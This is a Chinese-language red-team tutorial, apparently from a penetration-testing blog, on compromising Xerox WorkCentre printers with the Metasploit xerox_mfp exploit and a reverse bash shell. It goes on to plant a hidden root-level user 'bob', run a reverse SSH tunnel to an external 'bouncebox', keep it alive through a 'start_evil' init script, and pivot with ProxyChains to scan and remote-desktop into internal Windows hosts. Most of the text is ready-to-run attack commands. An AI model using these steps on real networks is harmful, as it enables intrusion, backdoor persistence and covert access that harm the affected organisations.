一直以來(lái)我們都在討論多功能打印機(jī)(MFP)在企業(yè)環(huán)境下所帶來(lái)的風(fēng)險(xiǎn)，以及攻擊者如何輕易的利用其來(lái)進(jìn)行惡意攻擊，比如通過LDAP提取Windows Active Directory的證書或者濫用“掃描文件”和“掃描電子郵件”功能。

而在最近一次我們的攻防演練中，在通過MFP設(shè)備攻擊Windows Active Directory時(shí)，我們利用該設(shè)備隱藏了我們的位置，這使得針對(duì)MFP設(shè)備的攻擊進(jìn)入了新的階段。在本文中我們就來(lái)分享一下如何利用被盜用的Xerox Workcentre MFP設(shè)備來(lái)進(jìn)行APT的細(xì)節(jié)。

首先我們要確定該Xerox Workcentre MFP設(shè)備在已經(jīng)被入侵的網(wǎng)絡(luò)中很容易受到固件注入攻擊。實(shí)際上該技術(shù)早在2012年就已經(jīng)被發(fā)表了，但由于缺乏對(duì)這一類物聯(lián)網(wǎng)設(shè)備的強(qiáng)制性更新，目前仍有大量的Xerox Workcentre MFP設(shè)備會(huì)受到這種攻擊，這一點(diǎn)可以很容易的通過Metasploit中的xerox_mfp模塊來(lái)進(jìn)行驗(yàn)證。而如果設(shè)備并不容易遭受攻擊，或者攻擊的結(jié)果只能夠進(jìn)行打印等操作，那顯然是毫無(wú)價(jià)值的。但是如果它存在嚴(yán)重漏洞可以使你獲得反向shell并最終拿到該設(shè)備的Root權(quán)限，那就相當(dāng)?shù)挠袃r(jià)值了。

以下將向您展示通過Metasploit中的xerox_mfp模塊來(lái)實(shí)施此類攻擊。

[1]在Metasploit中選擇 xerox_mfp 模塊：

Use exploit/unix/misc/xerox_mfp
(http://www.rapid7.com/db/modules/exploit/unix/misc/xerox_mfp)

[2]接下來(lái)選擇反向 bash payload 模塊并使用它：

Set payload cmd/unix/reverse_bash

[3]最后使用以下命令設(shè)置目標(biāo)IP和本地IP:

set RHOST ipaddress
set LHOST ipaddress

[4]這里建議你設(shè)置 wfsdelay 到30，因?yàn)楫?dāng)你在進(jìn)行攻擊時(shí)打印機(jī)有可能進(jìn)入睡眠模式，這樣做可以在你等待會(huì)話連接到監(jiān)聽器時(shí)增加延時(shí)。

set wfsdelay 30

[5]一旦完成上面的操作，你就可以通過輸入或者運(yùn)行exploit來(lái)啟動(dòng)exploit。

Xerox exploit將會(huì)啟動(dòng)固件注入攻擊并返回一個(gè)可以接入MFP root權(quán)限的遠(yuǎn)程shell。

如下圖所示：

建立并啟用SSHD

當(dāng)你獲得了該MFP設(shè)備的root訪問權(quán)限后，需要進(jìn)行一些必要的配置，以便能夠啟用SSH隧道。第一步是建立SSH主機(jī)密鑰，使你可以啟動(dòng)MFP設(shè)備上的SSH進(jìn)程。

具體步驟如下：

輸入以下命令來(lái)生成dsa和rsa密鑰對(duì)：

ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key
ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key

當(dāng)有提示要輸入密碼時(shí)直接回車，下圖是生成密鑰的一個(gè)例子：

現(xiàn)在你可以使用下面的命令開啟SSH的進(jìn)程：

/usr/sbin/sshd

而當(dāng)其開始運(yùn)行后，如下命令可以進(jìn)行驗(yàn)證：

ps –ef |grep sshd

下圖中我們可以看到SSH進(jìn)程已啟動(dòng)，在本例中其進(jìn)程ID為17808。 version 1 的錯(cuò)誤屬于正常情況。

建立并啟用密鑰認(rèn)證

現(xiàn)在SSH進(jìn)程正在運(yùn)行，我們需要生成公鑰和私鑰，這樣將允許從打印機(jī)發(fā)起的到我們?cè)诠W(wǎng)上的SSH服務(wù)器的SSH連接，本次我們將這個(gè)公網(wǎng)上的SSH服務(wù)器命名為”bouncebox“。

首先我們要在打印機(jī)的根目錄下創(chuàng)建一個(gè).ssh的文件夾，當(dāng)SSH密鑰生成后將保存在該文件夾中。使用以下命令進(jìn)行該操作：

cd / && mkdir .ssh && cd .ssh

文件夾建立后我們繼續(xù)來(lái)生成SSH密鑰，使用以下命令即可：

ssh -keygen -t rsa

這里系統(tǒng)會(huì)提示新生成的密鑰保存在.ssh文件夾的默認(rèn)位置，我們只需敲擊回車即可，而當(dāng)提示輸入密碼時(shí)也一樣。

后面我們會(huì)驗(yàn)證SSH密鑰已經(jīng)被正確的創(chuàng)建了。不過現(xiàn)在我們需要將SSH公鑰添加到公網(wǎng)ssh服務(wù)器bouncebox的authorized_keys 文件中。使用下面的命令：

cat /.ssh/id_rsa.pub (on printer)
vi ~/.ssh/authorized_keys (on bouncebox)

既然該密鑰已經(jīng)在我們的bouncebox中配置好了，那么我們就可以建立一個(gè)從打印機(jī)到bouncebox的SSH連接，且無(wú)需處理密碼提示。

注意：允許打印機(jī)SSH連接到你的bouncebox，這意味著允許任何接入打印機(jī)的人做相同的事，所以你需要非常確定你的bouncebox中沒有存放任何敏感數(shù)據(jù)。

建立用戶賬戶

雖然我們可以使用root權(quán)限對(duì)MFP設(shè)備進(jìn)行訪問，但我們沒有密碼。因此除非你想花時(shí)間破解它否則最好的方法就是去創(chuàng)建一個(gè)用戶然后將該用戶添加到root組，使我們可以在SSH隧道操作過程中使用它。不幸的是安裝在Xerox Workcentres MFP上的嵌入式Linux Wind River 版本沒有adduser命令，所以需要我們手動(dòng)進(jìn)行創(chuàng)建，而這將需要改變?nèi)齻€(gè)文件。更大的問題是缺少一個(gè)好用的編輯器，因?yàn)樵赽ash shell中VI編輯器并不是那么好用。

所以保險(xiǎn)起見我們應(yīng)該首先把要編輯的三個(gè)文件進(jìn)行備份：

cp /etc/passwd /etc/passwd.bck
cp /etc/shadow /etc/shadow.bck
cp /etc/group /etc/group.bck

我總是會(huì)在繼續(xù)操作之前先驗(yàn)證我的文件是否已經(jīng)備份好了，通過下面的這個(gè)命令即可。如圖所示：

ls -al /etc/*.bck

我們要改變的第一個(gè)文件是/etc/passwd ，這里我們會(huì)使用以下命令添加新的用戶信息到該文件中。這里非常重要的一點(diǎn)是不要將雙重定向>>和>重定向弄混， >重定向?qū)?huì)將文件的所有內(nèi)容進(jìn)行重寫，但如果真的弄混了也不要慌張，因?yàn)槲覀冇袀浞荨?/p>

echo “bob:x:0:0:root:/:/bin/bash” >> /etc/passwd

如果一切正確你的password文件應(yīng)該和下圖一樣：

下一個(gè)要修改的文件是/etc/shadow。該修改是通過使用echo和 雙重定向>>來(lái)添加數(shù)據(jù)到該文件。

輸入下面這行命令即可進(jìn)行這一修改：

echo “bob:E9lQCJhXRn9sc:16781::::::” >> /etc/shadow

完成這一操作后你的shadow文件像下圖一樣即可：

最后需要修改的文件是 /etc/group。這里需要進(jìn)行兩次修改，第一次是將新用戶的信息添加到文件的末尾，使用如下命令：

echo “bob:x:102:” >> /etc/group

第二次修改涉及到使用sed命令將上面的bob用戶添加到其中。使用下面這行命令：

sed -i 's/root:x:0:root/root:x:0:root,bob/' /etc/group.tmp

完成上述操作后你的組文件應(yīng)該如下圖所示：

在完成了對(duì)三個(gè)文件的修改后，我們還需要對(duì)bob的密碼進(jìn)行修改，因?yàn)槲也淮_定shadow文件中的字符串(E9lQCJhXRn9sc)將會(huì)有什么影響，而更糟糕的狀況可能是它給了你一個(gè)類似“test123”的密碼。所以你需要通過下面這行命令以及提示去修改密碼：

passwd bob

一旦密碼確認(rèn)被修改后，你會(huì)看到如下圖所示：

開啟反向隧道到BounceBox

現(xiàn)在SSH密鑰已經(jīng)就位了，sshd已經(jīng)在運(yùn)行了并且用戶賬戶也已經(jīng)創(chuàng)建好了，那么接下來(lái)你需要去啟動(dòng)在MFP設(shè)備上的SSH隧道。以下命令將會(huì)通過MFP設(shè)備的22端口連接到你的bouncebox上的12345端口，請(qǐng)記住要把bouncebox的IP地址設(shè)置正確，并且要添加rsa_id.pub中的用戶名到known_hosts。

/usr/bin/ssh -N -R 12345:localhost:22 username@bouncebox -f

建立反向SSH隧道將本地主機(jī)連接到MFP設(shè)備

打印機(jī)成功建立了一個(gè)出站SSH連接到bouncebox后，我們可以使用此隧道進(jìn)入目標(biāo)網(wǎng)絡(luò)。這一步可以通過使用一系列的SSH命令創(chuàng)建反向SSH通道來(lái)實(shí)現(xiàn)。

首先，使用-L選項(xiàng)從SSH進(jìn)入bouncebox。正如手冊(cè)所述，-L選項(xiàng)是將本地主機(jī)上的指定端口轉(zhuǎn)發(fā)到指定主機(jī)的遠(yuǎn)程端口：

ssh -L 31337:localhost:12345 username@bouncebox

在該例子中，我們將本地的31337端口(攻擊機(jī))的流量轉(zhuǎn)發(fā)到bouncebox(公網(wǎng)轉(zhuǎn)發(fā)主機(jī))的12345端口，再由bouncebox上的12345端口將流量轉(zhuǎn)發(fā)到MFP設(shè)備(內(nèi)網(wǎng)中)的22端口。

現(xiàn)在我們已經(jīng)在bouncebox上建立了端口轉(zhuǎn)發(fā)，就可以通過本地(攻擊機(jī))SSH 的31337端口連接到打印機(jī)。然后使用-D選項(xiàng)允許動(dòng)態(tài)端口轉(zhuǎn)發(fā)，這將使得SOCKS服務(wù)器會(huì)允許我們通過打印機(jī)的網(wǎng)絡(luò)接口去發(fā)送流量，比如攻擊者機(jī)器通過bouncebox發(fā)動(dòng)對(duì)目標(biāo)網(wǎng)絡(luò)即打印機(jī)端的端口掃描。

ssh -D 1080 bob@localhost -p 31337

保證持續(xù)性

如果你想保持持續(xù)性控制，那么你就需要將其加入到系統(tǒng)啟動(dòng)文件中。在這個(gè)例子中，Xerox Workcentre MFP設(shè)備并沒有Crontab功能。我發(fā)現(xiàn)最好的方式是在 /etc/init.d 中創(chuàng)建一個(gè)文件，然后在/etc/rc.d/rc3.d目錄文件夾中通過符號(hào)鏈接指向該文件。這將確保每一次打印機(jī)復(fù)位或者重啟時(shí)，你的隧道都可以被重建，而這也就是為什么會(huì)把它稱為高級(jí)持續(xù)性威脅(APT)。

現(xiàn)在我們已經(jīng)有sshd在運(yùn)行了，所以完全不需要再使用Metasploit通過反向bash shell去連接到MFP設(shè)備了。如果你按照上述指令來(lái)進(jìn)行的操作，你應(yīng)該能夠使用以下命令從你的主機(jī)系統(tǒng)登陸到MFP設(shè)備:

ssh bob@localhost -p 31337
vi start_evil

在VI中添加下述命令到文件中并保存：

#!/bin/bash
#
#startup ssh daemon service
/usr/sbin/sshd
#initiate the ssh tunnel to the bounce box
/usr/bin/ssh -N -R 12345:localhost:22 username@bouncebox -f

最后一步是在 /etc/rc.d/rc3.d/文件夾中建立一個(gè)符號(hào)鏈接，使用以下命令即可：

cd /etc/rc.d/rc3.d/
ln -s /etc/rc.d/init.d/start_evil S777_start_evil

好了，現(xiàn)在如果MFP設(shè)備復(fù)位或者重啟的話，你的ssh隧道也仍然能夠重新連接到bouncebox了。

使用ProxyChains和SOCKS代理

為了能夠使用攻擊工具，我們使用了代理服務(wù)器軟件ProxyChains，它能夠允許我們通過之前建立的動(dòng)態(tài)端口轉(zhuǎn)發(fā)進(jìn)行通信。

在攻擊機(jī)上，我們安裝了ProxyChains，使得我們能夠使用動(dòng)態(tài)端口轉(zhuǎn)發(fā)。我們編輯了這個(gè)配置文件/etc/proxychains.conf，然后添加了下面這行：

socks4 127.0.0.1 1080

(動(dòng)態(tài)的將1080端口的流量轉(zhuǎn)發(fā)到了31337端口，31337端口將流量轉(zhuǎn)發(fā)到bouncebox的12345端口，12345端口將流量轉(zhuǎn)發(fā)到內(nèi)網(wǎng)MFP設(shè)備的22端口)

ProxyChains配置完成后，我們就可以開始使用攻擊工具了。在下面的例子中我們使用端口掃描工具nmap去掃描目標(biāo)網(wǎng)絡(luò)下的windows系統(tǒng)。使用以下命令即可：

proxychains nmap -Pn -sT 192.168.2.72 -p 445,3389

在識(shí)別出一個(gè)windows系統(tǒng)后，我們就可以使用以下命令去連接到遠(yuǎn)程桌面服務(wù)：

proxychains rdesktop 192.168.2.72

作為一個(gè)POC，我們通過遠(yuǎn)程桌面服務(wù)登錄到windows系統(tǒng)，然后運(yùn)行netstat命令去查看建立的連接。這里我們可以看到打印機(jī)(192.168.2.200)正在監(jiān)聽一個(gè)從windows服務(wù)器(192.168.2.72)到遠(yuǎn)程桌面端口3389的連接。